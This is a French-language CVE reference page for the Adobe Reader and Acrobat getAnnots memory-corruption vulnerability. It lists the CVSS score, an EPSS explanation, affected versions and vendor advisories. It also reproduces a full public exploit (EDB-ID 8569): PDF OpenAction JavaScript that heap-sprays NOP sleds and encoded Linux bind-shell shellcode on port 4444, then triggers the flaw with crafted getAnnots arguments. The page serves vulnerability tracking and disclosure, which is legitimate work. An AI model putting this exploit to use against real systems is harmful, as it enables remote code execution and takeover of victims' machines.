Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 8569
Date de publication : 2009-04-28 22h00 +00:00
Auteur : Arr1val
EDB Vérifié : Yes
//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.
//##############
var memory;
function New_Script()
{
//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
var startwith = app.alert('Hi');//required for adobe9
var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
while(nop.length <= 0x100000/2) nop+=nop;
nop=nop.substring(0,0x100000/2 - shellcode.length);
memory=new Array();
for(i=0;i<0x6ff;i++) //we should at least overwrite 0x90909090
{memory[i]=nop + shellcode;}
//start exploit now
start();
function start()
{
this.getAnnots(-134217728,-134217728,-134217728,-134217728);
}
}
//############################
# milw0rm.com [2009-04-29]
Products Mentioned
Configuraton 0
Adobe>>Acrobat >> Version From (including) 7.0 To (including) 7.1.1
- Adobe>>Acrobat >> Version 7.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.4 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.5 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.6 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.7 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.8 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.0.9 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.1.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 7.1.1 (Open CPE detail)
Adobe>>Acrobat >> Version From (including) 8.0 To (including) 8.1.4
- Adobe>>Acrobat >> Version 8.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.0.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.4 (Open CPE detail)
Adobe>>Acrobat >> Version From (including) 9.0 To (including) 9.1
- Adobe>>Acrobat >> Version 9.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.1 (Open CPE detail)
Configuraton 0
Adobe>>Acrobat_reader >> Version From (including) 7.0 To (including) 7.1.1
- Adobe>>Acrobat_reader >> Version 7.0 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.1 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.2 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.3 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.4 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.5 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.6 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.7 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.8 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.0.9 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.1.0 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 7.1.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version From (including) 8.0 To (including) 8.1.4
- Adobe>>Acrobat_reader >> Version 8.0 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 8.1 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 8.1.1 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 8.1.2 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 8.1.3 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 8.1.4 (Open CPE detail)
Adobe>>Acrobat_reader >> Version From (including) 9.0 To (including) 9.1
- Adobe>>Acrobat_reader >> Version 9.0 (Open CPE detail)
- Adobe>>Acrobat_reader >> Version 9.1 (Open CPE detail)
Références
http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00003.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://sunsolve.sun.com/search/document.do?assetkey=1-66-259028-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
